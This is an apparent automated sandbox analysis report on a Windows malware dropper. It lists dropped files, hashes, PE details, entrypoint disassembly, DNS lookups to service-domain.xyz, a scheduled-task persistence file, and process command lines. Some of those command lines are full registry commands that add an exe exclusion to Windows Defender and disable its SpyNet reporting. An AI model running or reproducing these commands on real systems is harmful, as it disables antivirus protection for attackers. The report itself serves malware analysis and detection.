                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 51%
                                        Joe Sandbox View:
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        • Filename: file.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ambua3bc.cdi.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ctvry2t3.t3r.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12144
                                        Entropy (8bit):5.377046628185695
                                        Encrypted:false
                                        SSDEEP:192:VtH+avFi5nkbYh/Gb2keE2DAsb+EBOYSVFEJ+aNK1e+9kN8rI:VteMKnkbrb50915SVS2rI
                                        MD5:FE9620200B9EB3960270D352AFBE2CD7
                                        SHA1:9FC7320FF2949D0552C0E191A5F285A3BBEB663D
                                        SHA-256:8BD03B4334DBB86A806D029833321B7A39D587678403C6297371086CE9C12D7C
                                        SHA-512:E95E8F98B5490DD6A68828054138D12ABF2BBD38399CF25CA2BE4AA1F687F1FD6E943A729B3E89FB0F9B4E5288B8F193C783171F9254945DE78889672A3C8EE0
                                        Malicious:false
                                        Preview:@...e...........................................................H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration............................................T.@..>@...@.V.@.H.@.X.@.[.@.NT@.HT@..S@..S@.hT@..S@..S@..S@.\.@..T@..T@.@X@.?X@..T@..S@..S@..T@..T@.

                                        C:\Windows\System32\GroupPolicy\Machine\Registry.pol

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe
                                        File Type:RAGE Package Format (RPF),
                                        Category:dropped
                                        Size (bytes):4486
                                        Entropy (8bit):3.5339576290192576
                                        Encrypted:false
                                        SSDEEP:96:W9H9h9j9n9a9K9o92939l9S9nyJ0R0yi0A0L0e0R0G0w8:N
                                        MD5:D4FADEF490BFB3525A04D9552210611E
                                        SHA1:EC434E4EE2ED3077A2467840325F598518C9B6DF
                                        SHA-256:8E60A72948AF47830E2603912A98EF534C4DAD9D5EFEF105321B50EE4B99B9E3
                                        SHA-512:48FA3F3E55DCD1E73724D6DBD6C0100096F32FABBF2AA3C68786A8F0F5B223C8137EBCF99D3C102BDA8B393C4BAFD5BBFD43940FFC0A601E12536C9B4B19D906
                                        Malicious:false
                                        Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s...;.T.h.r.e.a.t.s._.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.2.5.4.5.1...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.5.6.5.9.6...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.4.2.8.7.2...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.1.4.7.7.4.9.3.7.3...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.

                                        C:\Windows\System32\GroupPolicy\gpt.ini

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):268
                                        Entropy (8bit):4.9507895998010145
                                        Encrypted:false
                                        SSDEEP:6:1QnMzYHxbnPonn3dXsMzYHxbnn/JIAuNhUHdhJg+5Rnn3dzC:1QM0HxbnIV0Hxbn/JnumuuzC
                                        MD5:A62CE44A33F1C05FC2D340EA0CA118A4
                                        SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
                                        SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
                                        SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
                                        Malicious:true
                                        Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.

                                        C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.job

                                        Download File
                                        Process:C:\Windows\SysWOW64\schtasks.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):526
                                        Entropy (8bit):3.684926359710003
                                        Encrypted:false
                                        SSDEEP:12:2gdCXO3qQ1zKvkutlbKMiTM5S3qQ1zKvkuwFhwVJ:Xd/L5vsKNL5vx
                                        MD5:3D1ACFB3B776CECD896559D840823F0E
                                        SHA1:5D0D68CBA95291B53860D613BCC7342FDEA1A557
                                        SHA-256:3CD11F87DDB03E7BDD95EC0DCC9D612F7D6D399A3136788D6927960D752E2FCB
                                        SHA-512:3D0EC87EC5B8D2B400AB3473C417A17AB682710690BDDA316521C827C9FD9DDCBFC13C2E9152B0A41E76CCE469B58D4C259D9BAB088F164DA22177475831C344
                                        Malicious:false
                                        Preview:....J..X.0.L.....dw[F.......<... .....s...............................P.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.X.A.f.c.x.y.Y.i.T.Q.K.M.O.E.R.w.\.e.f.p.l.S.H.r.L.k.K.v.i.a.S.K.\.p.d.y.D.o.I.J...e.x.e.....D.C. ./.s.i.t.e._.i.d. .5.2.5.4.0.3. ./.S...D.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.X.A.f.c.x.y.Y.i.T.Q.K.M.O.E.R.w.\.e.f.p.l.S.H.r.L.k.K.v.i.a.S.K.....D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.\.h.a.r.d.z...................0...............................................

                                        C:\Windows\Temp\__PSScriptPolicyTest_22rgx3dy.2p3.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Windows\Temp\__PSScriptPolicyTest_umumzqbx.1yl.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe

                                        Download File
                                        Process:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):7104512
                                        Entropy (8bit):7.680459343919421
                                        Encrypted:false
                                        SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                                        MD5:893793FBD70BA4A92919D09205D6C9C1
                                        SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                                        SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                                        SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 51%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................

                                        \Device\ConDrv

                                        Download File
                                        Process:C:\Windows\System32\gpupdate.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):129
                                        Entropy (8bit):4.366220328806915
                                        Encrypted:false
                                        SSDEEP:3:gBgvKCGPE3UkEmdOO2AGN8cwwHBkEmdOO2AGN8cwow:guSFMEkErONGN83YkErONGN837
                                        MD5:EF6D648C3DA0518B784D661B0C0B1D3D
                                        SHA1:C5C5F6E4AD6C3FD8BE4313E1A7C2AF2CAA3184AD
                                        SHA-256:18C16D43EB823C1BC78797991D6BA2898ACA8EB2DE5FD6946BE880F7C6FBBEF5
                                        SHA-512:E1E0443CA2E0BAFAC7CBBFD36D917D751AC6BE2F3F16D0B67B43EEBD47D6A7C36F12423AFA95B6BF56E5AAD155675C3307EFC6E94F0808EB72EF27B093EADD67
                                        Malicious:false
                                        Preview:Updating policy.........Computer Policy update has completed successfully....User Policy update has completed successfully.......

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.996908423754259
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:file.exe
                                        File size:7604002
                                        MD5:e99e15a440798e20c682eb859b3f7885
                                        SHA1:b6f3b87894f51669dede0afe6cb4b504fe0ae614
                                        SHA256:c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
                                        SHA512:6cbbae34ab571522545be0c27e1f13cf0d8545f8ba69c3d343b3ac1c1f113b7dbe6e3ce26a3897a1197bc0b57378165ab8145c29332b99d83e50b87c513e7d5e
                                        SSDEEP:196608:91OcMHdXjgqBmVcMymSmuw3lIk3+C83fqpI/jdyNVaZ4g:3OcuF9m51T1Iku93f8wd8Rg
                                        TLSH:6276333174C19CF2DE173231A28D2AE175F6EDD84D636A3717428A3A297D24AC3B1E53
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y...s...,...s...r.!.s.......s...x...s.......s.......s.^.u...s.Rich..s.........PE..L....S.L...........

                                        File Icon

                                        Icon Hash:8484d4f2b8f47434

                                        Static PE Info

                                        General

                                        Entrypoint:0x414b04
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:
                                        Time Stamp:0x4CE553F7 [Thu Nov 18 16:27:35 2010 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:3786a4cf8bfee8b4821db03449141df4

                                        Entrypoint Preview

                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        push FFFFFFFFh
                                        push 0041B9E0h
                                        push 00414A2Ch
                                        mov eax, dword ptr fs:[00000000h]
                                        push eax
                                        mov dword ptr fs:[00000000h], esp
                                        sub esp, 58h
                                        push ebx
                                        push esi
                                        push edi
                                        mov dword ptr [ebp-18h], esp
                                        call dword ptr [0041B074h]
                                        xor edx, edx
                                        mov dl, ah
                                        mov dword ptr [004233D0h], edx
                                        mov ecx, eax
                                        and ecx, 000000FFh
                                        mov dword ptr [004233CCh], ecx
                                        shl ecx, 08h
                                        add ecx, edx
                                        mov dword ptr [004233C8h], ecx
                                        shr eax, 10h
                                        mov dword ptr [004233C4h], eax
                                        push 00000001h
                                        call 00007EFF5068258Bh
                                        pop ecx
                                        test eax, eax
                                        jne 00007EFF506816FAh
                                        push 0000001Ch
                                        call 00007EFF506817B8h
                                        pop ecx
                                        call 00007EFF5068203Dh
                                        test eax, eax
                                        jne 00007EFF506816FAh
                                        push 00000010h
                                        call 00007EFF506817A7h
                                        pop ecx
                                        xor esi, esi
                                        mov dword ptr [ebp-04h], esi
                                        call 00007EFF506841ACh
                                        call dword ptr [0041B078h]
                                        mov dword ptr [00425A3Ch], eax
                                        call 00007EFF5068406Ah
                                        mov dword ptr [00423340h], eax
                                        call 00007EFF50683E13h
                                        call 00007EFF50683D55h
                                        call 00007EFF506837B0h
                                        mov dword ptr [ebp-30h], esi
                                        lea eax, dword ptr [ebp-5Ch]
                                        push eax
                                        call dword ptr [0041B07Ch]
                                        call 00007EFF50683CE6h
                                        mov dword ptr [ebp-64h], eax
                                        test byte ptr [ebp-30h], 00000001h
                                        je 00007EFF506816F8h
                                        movzx eax, word ptr [ebp+00h]

                                        Rich Headers

                                        Programming Language:
                                        • [ C ] VS98 (6.0) SP6 build 8804
                                        • [C++] VS98 (6.0) SP6 build 8804
                                        • [ C ] VS2010 build 30319
                                        • [ASM] VS2010 build 30319
                                        • [EXP] VC++ 6.0 SP5 build 8804

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1e9e40x64.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000xa60.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x1f8.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x199ea0x19a00False0.5822884908536585DOS executable (COM)6.608494417524647IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x1b0000x44940x4600False0.31166294642857145data4.368016436198423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x200000x5a480x3200False0.122890625data1.370539432871311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .sxdata0x260000x40x200False0.02734375data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x270000xa600xc00False0.3388671875data3.3019646948427273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x274a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                        RT_ICON0x277880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States
                                        RT_DIALOG0x278d80xb8dataEnglishUnited States
                                        RT_STRING0x279900x94dataEnglishUnited States
                                        RT_STRING0x27a280x34dataEnglishUnited States
                                        RT_GROUP_ICON0x278b00x22dataEnglishUnited States
                                        RT_VERSION0x271e00x2bcdataEnglishUnited States

                                        Imports

                                        DLLImport
                                        OLEAUT32.dllVariantClear, SysAllocString
                                        USER32.dllSendMessageA, SetTimer, DialogBoxParamW, DialogBoxParamA, SetWindowLongA, GetWindowLongA, SetWindowTextW, LoadIconA, LoadStringW, LoadStringA, CharUpperW, CharUpperA, DestroyWindow, EndDialog, PostMessageA, ShowWindow, MessageBoxW, GetDlgItem, KillTimer, SetWindowTextA
                                        SHELL32.dllShellExecuteExA
                                        KERNEL32.dllGetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InterlockedIncrement, InterlockedDecrement, GetProcAddress, GetOEMCP, GetACP, GetCPInfo, IsBadCodePtr, IsBadReadPtr, GetFileType, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, HeapSize, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapCreate, HeapDestroy, GetEnvironmentVariableA, SetUnhandledExceptionFilter, TlsAlloc, ExitProcess, GetVersion, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, WaitForSingleObject, CloseHandle, CreateProcessA, SetCurrentDirectoryA, GetCommandLineW, GetVersionExA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetLastError, LoadLibraryA, AreFileApisANSI, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetWindowsDirectoryA, SetFileTime, CreateFileW, SetLastError, SetFileAttributesA, RemoveDirectoryA, SetFileAttributesW, RemoveDirectoryW, CreateDirectoryA, CreateDirectoryW, DeleteFileA, DeleteFileW, lstrlenA, GetFullPathNameA, GetFullPathNameW, GetCurrentDirectoryA, GetTempPathA, GetTempFileNameA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, ReadFile, WriteFile, SetEndOfFile, GetStdHandle, WaitForMultipleObjects, Sleep, VirtualAlloc, VirtualFree, CreateEventA, SetEvent, ResetEvent, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, GetCurrentThreadId, TlsSetValue, TlsGetValue, ExitThread

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Network Port Distribution

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 24, 2022 19:16:15.101864100 CET5238753192.168.2.38.8.8.8
                                        Nov 24, 2022 19:16:15.119308949 CET53523878.8.8.8192.168.2.3
                                        Nov 24, 2022 19:16:15.974688053 CET5692453192.168.2.38.8.8.8
                                        Nov 24, 2022 19:16:16.000452042 CET53569248.8.8.8192.168.2.3

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 24, 2022 19:16:15.101864100 CET192.168.2.38.8.8.80xc24cStandard query (0)service-domain.xyzA (IP address)IN (0x0001)false
                                        Nov 24, 2022 19:16:15.974688053 CET192.168.2.38.8.8.80x51c1Standard query (0)clients2.google.comA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 24, 2022 19:16:15.119308949 CET8.8.8.8192.168.2.30xc24cNo error (0)service-domain.xyz3.80.150.121A (IP address)IN (0x0001)false
                                        Nov 24, 2022 19:16:16.000452042 CET8.8.8.8192.168.2.30x51c1No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                        Nov 24, 2022 19:16:16.000452042 CET8.8.8.8192.168.2.30x51c1No error (0)clients.l.google.com142.250.203.110A (IP address)IN (0x0001)false

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:19:15:05
                                        Start date:24/11/2022
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\file.exe
                                        Imagebase:0x400000
                                        File size:7604002 bytes
                                        MD5 hash:E99E15A440798E20C682EB859B3F7885
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Target ID:1
                                        Start time:19:15:06
                                        Start date:24/11/2022
                                        Path:C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe
                                        Wow64 process (32bit):true
                                        Commandline:.\Install.exe
                                        Imagebase:0x400000
                                        File size:6571809 bytes
                                        MD5 hash:65D01849A2062434BCE6C580CDA92A1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 41%, ReversingLabs
                                        Reputation:low

                                        General

                                        Target ID:2
                                        Start time:19:15:08
                                        Start date:24/11/2022
                                        Path:C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe
                                        Wow64 process (32bit):true
                                        Commandline:.\Install.exe /S /site_id "525403"
                                        Imagebase:0x3f0000
                                        File size:7104512 bytes
                                        MD5 hash:893793FBD70BA4A92919D09205D6C9C1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 51%, ReversingLabs
                                        Reputation:low

                                        General

                                        Target ID:3
                                        Start time:19:15:10
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\forfiles.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
                                        Imagebase:0x10f0000
                                        File size:41472 bytes
                                        MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:4
                                        Start time:19:15:10
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:5
                                        Start time:19:15:10
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\forfiles.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
                                        Imagebase:0x10f0000
                                        File size:41472 bytes
                                        MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:6
                                        Start time:19:15:10
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:7
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
